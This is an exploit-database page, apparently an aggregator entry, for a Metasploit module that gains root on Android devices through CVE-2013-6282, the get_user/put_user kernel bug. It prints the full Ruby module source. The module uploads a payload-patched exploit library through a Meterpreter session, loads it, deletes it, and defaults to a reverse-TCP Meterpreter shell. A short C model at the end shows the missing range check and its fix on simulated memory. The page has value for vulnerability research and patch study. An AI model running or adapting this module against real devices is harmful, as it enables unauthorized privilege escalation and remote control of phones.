Android get_user/put_user Exploit

Published 13 Dec 2016 09:23:02. Reported by fi01, cubeundcube, timwr. Type: metasploit. Source: www.rapid7.com. 73 views.

Android get_user/put_user Exploit in Linux Kernel before 3.5.


Related

| Source | Title | Published | Family |
| --- | --- | --- | --- |
| android | Qualcomm missing checks put_user get_user | 6 Sep 2013 00:00 | android |
| seebug.org | Linux ARM - Local Root Exploit | 1 Jul 2014 00:00 | seebug |
| Debian CVE | CVE-2013-6282 | 20 Nov 2013 13:19 | debiancve |
| Prion | Memory corruption | 20 Nov 2013 13:19 | prion |
| 0day.today | Android get_user/put_user Exploit | 26 Dec 2016 00:00 | zdt |
| Vulnrichment | CVE-2013-6282 | 19 Nov 2013 15:00 | vulnrichment |
| exploitpack | Linux Kernel 3.4.5 (Android 4.2.24.4 ARM) - Local Privilege Escalation | 11 Feb 2014 00:00 | exploitpack |
| RedhatCVE | CVE-2013-6282 | 30 Oct 2015 10:07 | redhatcve |
| UbuntuCve | CVE-2013-6282 | 20 Nov 2013 00:00 | ubuntucve |
| CISA KEV Catalog | Linux Kernel Improper Input Validation Vulnerability | 15 Sep 2022 00:00 | cisa_kev |

Code

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Common

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => "Android get_user/put_user Exploit",
          'Description' => %q{
            This module exploits a missing check in the get_user and put_user API functions
            in the linux kernel before 3.5.5. The missing checks on these functions
            allow an unprivileged user to read and write kernel memory.
            This exploit first reads the kernel memory to identify the commit_creds and
            ptmx_fops address, then uses the write primitive to execute shellcode as uid 0.
            The exploit was first discovered in the wild in the vroot rooting application.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'fi01', # libget_user_exploit / libput_user_exploit
            'cubeundcube', # kallsyms_in_memory
            'timwr',       # Metasploit module
          ],
          'References' => [
            [ 'CVE', '2013-6282' ],
            [ 'URL', 'https://forum.xda-developers.com/t/root-share-vroot-1-6-0-3690-1-click-root-method-lenovo-a706-walkman-f800-etc.2434453/' ],
            [ 'URL', 'https://github.com/fi01/libget_user_exploit' ],
            [ 'URL', 'https://forum.xda-developers.com/t/root-saferoot-root-for-vruemj7-mk2-and-android-4-3.2565758/' ],
          ],
          'DisclosureDate' => '2013-09-06',
          'SessionTypes' => [ 'meterpreter' ],
          'Platform' => [ 'android', 'linux' ],
          'Targets' => [[ 'Automatic', {}]],
          'Payload' => { 'Space' => 2048, },
          'DefaultOptions' => {
            'WfsDelay' => 120,
            'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',
          },
          'DefaultTarget' => 0,
          'Compat' => {
            'Meterpreter' => {
              'Commands' => %w[
                core_loadlib
                stdapi_fs_delete_file
                stdapi_fs_getwd
              ]
            }
          },
        }
      )
    )
  end

  def exploit
    local_file = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-6282.so")
    exploit_data = File.read(local_file, mode: 'rb')

    space = payload_space
    payload_encoded = payload.encoded

    # Substitute the placeholder in the library (4 NOPs followed by zero bytes,
    # 'Space' bytes in total) with our payload, NOP-padded to the same length.
    # When Metasploit has already NOP-padded the encoded payload to 'Space',
    # pad is zero; clamping avoids a negative repeat count otherwise.
    pad = [space - payload_encoded.length, 0].max
    exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * pad)

    workingdir = session.fs.dir.getwd
    remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
    write_file(remote_file, exploit_data)

    print_status("Loading exploit library #{remote_file}")
    session.core.load_library(
      'LibraryFilePath' => local_file,
      'TargetFilePath' => remote_file,
      'UploadLibrary' => false,
      'Extension' => false,
      'SaveToDisk' => false
    )
    print_status("Loaded library #{remote_file}, deleting")
    session.fs.file.rm(remote_file)
    print_status("Waiting #{datastore['WfsDelay']} seconds for payload")
  end
end
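The module's description attributes the bug to get_user/put_user accepting any pointer without checking that it lies in user space. The C model below is added here and is not part of the Metasploit module or of the Linux kernel: it contrasts an accessor with no range check against one that applies the overflow-safe access_ok-style test (size <= limit && addr <= limit - size). TASK_SIZE, the two simulated memory regions and their contents are constructed values for the demo.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed 32-bit layout: user space below TASK_SIZE (assumed 3G/1G
 * split), plus one user and one "kernel" region with known contents. */
#define TASK_SIZE   0xBF000000u
#define USER_BASE   0x7fff0000u
#define KERNEL_BASE 0xC0008000u
static const uint8_t user_bytes[]   = { 'u', 's', 'e', 'r' };
static const uint8_t kernel_bytes[] = { 'k', 'e', 'r', 'n' };

/* Shape of the bug: every pointer is accepted, kernel addresses included. */
static bool unchecked_user_access(uint32_t addr, uint32_t size)
{
    (void)addr; (void)size;
    return true;
}

/* Shape of the fix: the whole [addr, addr+size) range must sit below
 * TASK_SIZE. Testing size first makes TASK_SIZE - size safe from
 * underflow, so a huge size cannot wrap the sum back below the limit. */
static bool checked_user_access(uint32_t addr, uint32_t size)
{
    return size <= TASK_SIZE && addr <= TASK_SIZE - size;
}

/* Simulated get_user of one byte: -1 (EFAULT-like) if the accessor rejects
 * the pointer or nothing is mapped there, else 0 with the byte in *out. */
static int sim_get_user(bool (*access_ok)(uint32_t, uint32_t),
                        uint32_t addr, uint8_t *out)
{
    if (!access_ok(addr, 1))
        return -1;
    if (addr - USER_BASE < sizeof user_bytes)        /* unsigned wrap trick */
        *out = user_bytes[addr - USER_BASE];
    else if (addr - KERNEL_BASE < sizeof kernel_bytes)
        *out = kernel_bytes[addr - KERNEL_BASE];
    else
        return -1;
    return 0;
}

int main(void)
{
    uint8_t b = 0;
    printf("unchecked: rc=%d\n", sim_get_user(unchecked_user_access, KERNEL_BASE, &b));
    printf("checked:   rc=%d\n", sim_get_user(checked_user_access, KERNEL_BASE, &b));
    return 0;
}
```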
